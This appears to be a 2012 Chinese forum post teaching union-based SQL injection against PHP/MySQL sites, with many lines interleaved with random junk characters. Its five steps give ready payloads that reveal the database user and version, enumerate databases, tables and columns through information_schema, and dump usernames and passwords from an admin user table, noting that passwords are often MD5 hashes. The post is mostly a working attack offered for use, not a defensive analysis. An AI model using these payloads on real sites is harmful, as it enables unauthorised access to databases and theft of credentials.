- r: O \8 a& }& t% t9 e) c教程内容:Mysql 5+php 注入
1 ?; x( J- B8 U
+ z; Y. Z. c8 g2 g3 z9 F6 e1 F1 c) N [' L! w" L+ p
5 [$ C4 q9 G- v" N1 e/ G5 ?; M, V
一.查看MYSQL基本信息(库名,版本,用户)0 Y& m) t V" U3 r% G+ l7 H5 B
+ H; C9 {. P$ M ]
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
* J% ^9 Z: S9 b( Z3 {+ y
( F6 A; R6 Z+ c D3 V% f0 l二.查数据库
$ n* t7 K$ [/ H4 w1 R1 [6 F! P* o. d
! h) C3 O4 i( u- ]. Wand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
# A1 ~0 q7 J% j+ P/ F+ glimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
8 n0 Q- t, F \; W- M9 T3 }
7 F5 W0 P, c, q4 m三.暴表
4 x5 y* N6 W+ t# q# L
3 e9 R# |4 R- z3 E9 Q8 Tand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
) t, u% t; o* l X; u: D8 Z1 ^# L, `- B0 m8 J
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
1 B. M! s( ^- \. n( O2 }# h+ ]7 j# W
四.暴字段7 k% v3 H3 x+ { @4 d: V
' F1 L: I; x9 t$ e* Jand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
" j# { J; ?/ a5 ]! C0 ]
& g+ I: W1 Z) ~; Y7 |limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。5 u* F; |4 E5 y
7 a% N, G* d0 G
五.暴数据$ @0 Z5 s; i" Z0 i4 i d* X
- [, ?/ w! z# a/ V# Vand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*2 ~+ H- g9 ^7 f- G9 |% M
" a, N6 B: w6 B) L. L/ B
4 f$ i8 c1 L% A这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
% O: X# F2 G3 |# c+ `" B |
发表于 2012-9-13 16:27:53
收藏
支持
反对